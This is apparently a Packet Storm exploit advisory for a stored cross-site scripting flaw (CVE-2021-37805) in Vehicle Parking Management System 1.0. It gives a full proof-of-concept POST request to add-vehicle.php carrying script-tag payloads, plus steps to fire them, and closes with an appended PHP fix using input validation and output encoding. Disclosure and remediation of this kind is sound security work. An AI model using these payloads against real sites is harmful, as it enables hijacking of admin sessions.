CVE-2021-37805: Vehicle Parking Management System 1.0 Cross Site Scripting ≈ Packet Storm
A stored cross-site scripting (XSS) vulnerability exists in Sourcecodester Vehicle Parking Management System version 1.0, via the add-vehicle.php endpoint.
# Exploit Title: Vehicle Parking Management System - Stored Cross-Site-Scripting (XSS)
# Date: 2021-07-09
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10, XAMPP

################
# Description  #
################

# The system is vulnerable to Stored XSS on add-vehicle.php endpoint.

#######
# PoC #
#######

PoC ) param vehcomp,vehreno,ownername - Stored XSS

Payload: 1;<script>alert(1);</script>

Request:
========

POST /vpms/add-vehicle.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------39455081863880051020862918006
Content-Length: 842
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/vpms/add-vehicle.php
Cookie: PHPSESSID=01nt1pa7lgtioktv5ii907c8l3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="catename"

Bicycles
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehcomp"

1;<script>alert(1);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehreno"

2;<script>alert(2);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownername"

3;<script>alert(3);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownercontno"

7627637673
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="submit"


-----------------------------39455081863880051020862918006--

###########
# Fire up #
###########

1) Goto: Login as Admin
2) Goto: Manage Vehicle -> Manage In Vehicle -> Click view
3) Stored XSS payloads are fired
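
The fix for the stored XSS described above, as an added example that is not part of the original advisory or the application's own code: allow-list validation when the add-vehicle.php form is submitted, and HTML encoding when the stored values are rendered on the view page. The field names are taken from the PoC request; the helper names `e()` and `validate_vehicle()`, the validation patterns and the table markup are assumptions.

```php
<?php
// Added example, not the application's code. Field names come from the PoC
// request; helper names and validation patterns are assumptions.

// Encode a stored value for an HTML text or quoted-attribute context.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Allow-list validation applied before the row is stored (defence in depth;
// output encoding remains the primary control). Returns the failing fields.
function validate_vehicle(array $post): array
{
    $rules = [
        'vehcomp'     => '/\A[\p{L}\p{N} .&-]{1,60}\z/u',  // assumed: company name
        'vehreno'     => '/\A[A-Za-z0-9 -]{1,20}\z/',      // assumed: registration no.
        'ownername'   => '/\A[\p{L} .\'-]{1,80}\z/u',      // assumed: person name
        'ownercontno' => '/\A[0-9]{7,15}\z/',              // assumed: phone digits
    ];
    $errors = [];
    foreach ($rules as $field => $pattern) {
        $value = $post[$field] ?? '';
        if (!is_string($value) || preg_match($pattern, $value) !== 1) {
            $errors[] = $field;
        }
    }
    return $errors;
}

// Constructed sample: the values submitted in the PoC request.
$row = [
    'vehcomp'     => '1;<script>alert(1);</script>',
    'vehreno'     => '2;<script>alert(2);</script>',
    'ownername'   => '3;<script>alert(3);</script>',
    'ownercontno' => '7627637673',
];

// Input side: list the fields that fail validation and must not be stored.
echo 'Rejected fields: ', implode(', ', validate_vehicle($row)), PHP_EOL;

// Output side: a row that is already in the database is rendered as inert
// text, because markup characters are emitted as HTML entities.
foreach ($row as $field => $value) {
    echo '<tr><th>', e($field), '</th><td>', e($value), '</td></tr>', PHP_EOL;
}
```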